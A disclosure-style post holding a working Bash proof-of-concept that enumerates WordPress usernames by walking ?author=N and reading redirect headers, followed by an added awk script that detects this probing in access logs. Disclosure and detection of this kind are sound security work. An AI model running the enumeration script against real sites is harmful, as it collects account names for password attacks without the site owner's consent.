WordPress User Enumeration PoC Shell Script

A WordPress username enumeration vulnerability was recently disclosed here: http://seclists.org/fulldisclosure/2011/May/493

Versions affected: 2.6, 3.1, 3.1.1, 3.1.3

Here I am enclosing a simple PoC which can be run in a Bash shell.
(Note: a PoC in Python is already available for those who are curious.)

#!/bin/bash
# WordPress User Enumeration PoC by Anant Shrivastava
# Disclosure : http://seclists.org/fulldisclosure/2011/May/493
# License : GPLv2
# License URL : http://www.gnu.org/licenses/gpl-2.0.html
if [ $# -ne 1 ]
then
    echo "Wordpress username enumeration PoC"
    echo "based on disclosure @ : http://seclists.org/fulldisclosure/2011/May/493 "
    echo "$0" "URL of Website"
else
    count=0
    title=0    # becomes 1 once the table header has been printed
    # Walk author IDs 0..99
    while [ $count -lt 100 ]
    do
        # HEAD request only; a redirect's Location header carries the author slug
        result=$(curl -I -s --max-time 30 --max-filesize 1 "$1?author=$count" | grep -F 'Location:')
        # The slug is the last path component of the Location URL
        name=$(echo "$result" | rev | cut -f2 -d"/" | rev)
        # A non-empty result means the server answered this ID with a redirect
        if [ -n "$result" ]
        then
            if [ "$title" -eq 0 ]
            then
                echo "ID : UserName"
                title=1
            fi
            echo -n "$count" " : "
            echo "$name"
        fi
        count=$((count + 1))
    done
    if [ "$title" -eq 0 ]
    then
        echo "Either this site is not vulnerable or is not using wordpress hosted"
    fi
fi

The code can be downloaded from here: https://github.com/anantshri/script-collection/blob/master/wp-user-enum.sh
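The request pattern this PoC produces (sequential ?author=N requests answered with redirects) is easy to find in web server access logs. The following is an added example, not part of the original post or the author's repository: it flags clients that requested many distinct author IDs and counts how many of those IDs were answered with a redirect. The function names, the threshold and the sample log lines are constructed, and the field positions assume common/combined log format.

```shell
#!/bin/bash
# Added example: find clients walking ?author=N in a web access log.
# Assumes common/combined log format: $1 = client IP, $7 = request
# target, $9 = HTTP status.

# Usage: detect_author_enum THRESHOLD < access.log
# Prints "IP distinct_ids redirected_ids" for every client that asked for
# at least THRESHOLD distinct author IDs. redirected_ids counts the IDs
# whose first response was a 301/302, i.e. a response with a Location header.
detect_author_enum() {
    awk -v threshold="$1" '
    match($7, /[?&]author=[0-9]+/) {
        id = substr($7, RSTART, RLENGTH)
        sub(/^.*=/, "", id)
        key = $1 SUBSEP id
        if (!(key in seen)) {
            seen[key] = 1
            distinct[$1]++
            if ($9 ~ /^30[12]$/) redirected[$1]++
        }
    }
    END {
        for (ip in distinct)
            if (distinct[ip] >= threshold)
                print ip, distinct[ip], redirected[ip] + 0
    }' | sort
}

# Constructed sample lines (documentation address ranges), not real traffic.
sample_log() {
    cat <<'EOF'
198.51.100.7 - - [01/Jun/2011:10:00:01 +0000] "HEAD /?author=0 HTTP/1.1" 200 0
198.51.100.7 - - [01/Jun/2011:10:00:01 +0000] "HEAD /?author=1 HTTP/1.1" 301 0
198.51.100.7 - - [01/Jun/2011:10:00:02 +0000] "HEAD /?author=2 HTTP/1.1" 301 0
198.51.100.7 - - [01/Jun/2011:10:00:02 +0000] "HEAD /?author=3 HTTP/1.1" 200 0
203.0.113.9 - - [01/Jun/2011:10:05:00 +0000] "GET /?author=1 HTTP/1.1" 301 0
203.0.113.9 - - [01/Jun/2011:10:05:09 +0000] "GET /?author=1 HTTP/1.1" 301 0
203.0.113.9 - - [01/Jun/2011:10:05:30 +0000] "GET /about/ HTTP/1.1" 200 5120
EOF
}

sample_log | detect_author_enum 3
```

A single visitor opening one author archive stays below the threshold; the repeated request from 203.0.113.9 counts as one distinct ID.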
